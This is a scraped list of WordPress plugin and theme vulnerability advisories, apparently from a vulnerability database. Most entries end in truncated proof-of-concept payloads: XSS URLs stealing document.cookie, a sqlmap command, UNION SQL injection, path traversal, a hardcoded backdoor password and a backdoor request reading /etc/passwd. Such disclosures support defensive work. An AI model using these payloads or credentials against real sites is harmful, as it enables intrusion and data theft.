Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The tidio-gallery WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="alert1;"...
defa-online-image-protector <= 3.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The defa-online-image-protector WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/defa-online-image-protector/redirect.php?r="alert1;"...
AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The ajax-random-post WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/ajax-random-post/js.php?interval="alert1;"...
Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass
With the plugin "Stop User Enumeration 1.3.3" in use, it is possible to bypass it and obtain the usernames. Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1...
wp-championship <= 5.8 - Authenticated Blind SQL Injection
The wp-championship WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. $ sqlmap -u 'http://www.example.com/wp-admin/wp-championship/csadminusers.php&userid=' --data="isadmin=1&user" --cookie=AUTHCOOKIEHERE --level=5 --risk=3...
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
The code in csv2wpecCouponFileUpload.php does not properly sanitize user input; it checks the file mime-type for type x-php, but this can be tricked when using the short code for "; $uploadfile="/var/www/s.pht"; $ch =...
StageShow <= 5.0.8 - Open Redirect
The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. http://www.example.com/wp-content/plugins/stageshow/stageshowredirect.php?url=http%3A%2F%2F2buntu.com...
SE HTML5 Album Audio Player <= 1.1.0 - Local File Include
The se-html5-album-audio-player v1.1.0 plugin for WordPress has a local file include vulnerability. The downloadaudio.php file does not check whether the user is authenticated; it only attempts to check that the path is in /wp-content/uploads, which is easily defeated with ../...
PowerPress Podcasting < 6.0.1 - Cross-Site Scripting (XSS)
The PowerPress Podcasting plugin by Blubrry was affected by a Cross-Site Scripting XSS security vulnerability. /wp-admin/admin.php?page=powerpress/powerpressadmincategoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--alert0x014068...
slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard
The SlideDeck 2 Lite Responsive Content Slider WordPress plugin was affected by an XSS in ZeroClipboard security vulnerability. /wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id="catcheif!self.aself.a=!alertdocument.cookie//&width&height...
Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability...
Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...
WP DB Error Manager <= 2.1.6 - Reflected Cross-Site Scripting (XSS)
Reflected XSS in the file "admin/partials/wp-db-error-manager-login-display.php" in parameter "email" query string https://example.com/wp-content/plugins/wp-database-error-manager/admin/partials/wp-db-error-manager-login-display.php?email=%22%3E%3Cimg%20src%20onerror=alert/XSS/%3E...
Love Travel < 2.0 - Unauthenticated Reflected XSS & XFS
Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the Love Travel theme for WordPress, affected versions: 1.0-1.9. Vulnerable parameters: ndtravelarchiveformkeyword, ndtraveltypologyslug. The issue was fixed due to a code rewrite of the theme. $ :: Payloads: " "...
Bulk Change <= 1.0 - Authenticated Reflected Cross-Site Scripting
The Bulk Change page under Tools Bulk Posts Change has an 's' GET parameter echoed to a text input tag value without being sanitised, leading to a cross-site scripting issue. /wp-admin/tools.php?page=bulk-change%2Fbulk-change.php&perpage=10&dosearch=Search+...&changeposttype&bctpaction&s="alertXS...
Careerfy < 4.3.0 - Unauthenticated Reflected Cross-Site Scripting
An Unauthenticated Reflected XSS vulnerability was discovered in the Careerfy Job Board theme v4.2.0 for WordPress. https://careerfy.net/careerbooster/jobs-listing/?jobtype=%3Cimg%20src=x%20onerror=alertXSS;%3E...
Workio – Job Board < 1.0.3 - Unauthenticated Reflected XSS
An Unauthenticated Reflected XSS vulnerability was discovered in the «Workio – Job Board WordPress Theme»; tested version: v1.0.1. https://www.demoapus-wp1.com/workio/jobs-grid-v1/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alertXSS%3E...
SportsPress < 2.7.2 - Authenticated Stored Cross-Site Scripting
Any user with the role of administrator or League Manager is able to store XSS payloads in the custom delimiter setting of events pages. This will then execute on all events pages on the website. Video PoC: https://youtu.be/J8QZ8S6CiS8...
Elementor Page Builder < 2.9.10 - Authenticated Stored XSS
The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS. javascript:alert1, JaVaScript:alert1, javas cript:alert1 @keyframes x...
wpForo < 1.7.0 - Reflected Cross-Site Scripting (XSS) via s Parameter
The plugin did not validate or escape the 's' GET parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue that executes in the context of a logged-in admin. https://example.com/wp-admin/admin.php?page=wpforo-phrases&s="alert/XSS/...
Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move/rename the png file to a...
Tickera WordPress Event Ticketing < 3.4.6.9 - Unauthenticated Sensitive Data Exposure
Due to missing authorization controls in the "admininit" hooks, all personal data from registered users of an event could be exported into a downloadable PDF file by every unauthenticated user. The event ID could be read from the page source and/or easily enumerated in sequence. According to the...
Chained Quiz < 1.1.9.1 - Authenticated Stored XSS
The WordPress plugin Chained Quiz 1.1.9 and before suffers from a Stored XSS vulnerability in the sendername, adminsubject and usersubject POST parameters when an admin completes the plugin settings; as a result, the severity is very low. POST /wp-admin/admin.php?page=chainedquizoptions...
Seo By Rank Math <= 1.0.27 - Authenticated Settings Reset
Allows any authenticated user with a role as low as subscriber to reset Settings of the plugin. https://plugins.trac.wordpress.org/browser/seo-by-rank-math/tags/1.0.27/includes/admin/class-options.phpL91...
Slick Popup <= 1.7.1 - Privilege Escalation
Subscriber users are able to create an administrator account with hardcoded login credentials. The hardcoded username is "slickpopupteam" and its password is OmakPass13...
FV Flowplayer Video Player <= 7.3.13.727 - Unauthenticated Stored XSS
The vulnerable function is exposed to unauthenticated users over wpajaxnoprivfvwpflowplayeremailsignup ajax hook. It saves anything that user provides in email POST parameter. Send POST request to wp-admin/admin-ajax.php with body content: "action=fvwpflowplayeremailsignup&list=1&[email protected]"...
Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)
This WordPress plugin allows remote authenticated users, without the unfilteredhtml capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges. POC 1 You can inject JavaScript code into the event title when...
UK Cookie Consent <= 2.3.9 - Authenticated Stored Cross-Site Scripting (XSS)
A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows arbitrary HTML/script code to be executed in a victim's web browser. Tested on version 2.3.9; older versions may also be affected. 1. Access WordPress control panel. 2...
Category Order and Taxonomy Terms Order <= 1.5.2.2 - Authenticated PHP Object Injection
Usage of unserialize on user input in the saving request of the orders leads to PHP object injection vulnerability. Send POST request to "URL/wp-admin/admin-ajax.php" with parameters "action=update-taxonomy-order&order=SERIALIZED-OBJECT"...
Clean Login <= 1.7.12 - Change Redirect URL CSRF
The Clean Login WordPress plugin was affected by a Change Redirect URL CSRF security vulnerability...
Xtreme Locator Dealer Locator Plugin 1.5 – Authenticated SQL Injection
Type of user access: admin user. $_GET['id'] is not escaped. Accessible only to admin users. 1 - log in with an admin user; 2 - send GET request: http://www.example.com/wp-admin/admin.php?page=xtreme-locator-settings&id=0+UNION+ALL+SELECT+1%2Cslug%2Cname%2C4%2C5+FROM+wpterms+WHERE+termid%3D1...
ZX_CSV Upload 1 – Authenticated SQL Injection
Type of user access: admin user. $_GET['id'] is not escaped. URL is accessible to every registered user. 1 - Log in with an admin user. 2 - Send POST request:...
404 to 301 <= 2.3.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description: There is a stored XSS in the 404-to-301 WP plugin. alertdocument.cookie HTTP/1.1 Host: wordpress Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/537.36 KHTML, like Gecko Chrome/51.0.2704.103 Safari/537.36 Accept:...
CYSTEME Finder <= 1.3 - Unauthenticated LFI and Unauthenticated File Upload
CYSTEME does not properly check SESSION cookies, allowing a remote attacker to upload, view, or delete files from any location on the remote file system. - Retrieve all data in the root WordPress directory. This will return JSON. Exploit:...
Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)
The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;"&userid=1...
anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m="alert1;"...
HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="alert1;alert1;"...
MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/parsi-font/css.php?size="alert1;"...
New Year Firework <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The new-year-firework WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/new-year-firework/firework/index.php?text="alert1;"...
InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user's browser and potentially compromise the WordPress installation...
Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion
Authenticated file upload in the ajax-load-more/admin/admin.php file, in the function almsaverepeater. The variable $f is set to a predictable PHP file path, and then the content of the variable $c is written into that file. The following code proves that this second variable is also set from...
MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
The plugin is still affected and has been closed. Typical local file inclusion vulnerability, from downloadpage.php: I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log include: Failed opening '/proc/self/environ' for inclusion...
WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The wp-symposium WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/wp-symposium/getalbumitem.php?size=alert/xss/...
MP3-jPlayer <= 2.4.2 - Full Path Disclosure
The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed. $info = " Get: " . $mp3 . " Sent: " . $sent . " File: " . $file . " Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . " Root: " . $rooturl . " pID: "...
Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)
The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this...
Freshmail for WordPress <= 1.5.8 - shortcode.php SQL Injection
There is a SQL Injection vulnerability available to collaborators or higher privileged users on sites with the freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode FMform id="N". The shortcode attribute "id" is not sanitized before inserting it in ...
Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure
The local file syntax highlighting feature of Crayon Syntax Highlighter doesn't check the path of the file to process. Also, by default, this feature is usable through public comments. This allows unauthenticated visitors to see the content of any file for which the web server has read permissions,...
WordPress 2.1.1 - Command Execution Backdoor
http://www.example.com/wp-includes/feed.php?ix=phpinfo; http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd...
Podcast Channels < 0.28 - Unauthenticated Reflected XSS
The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://127.0.0.1/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
WP e-Commerce Swipe <= 3.1.0 - Multiple XSS Issues
The last time it was checked the plugin was still affected and had been closed...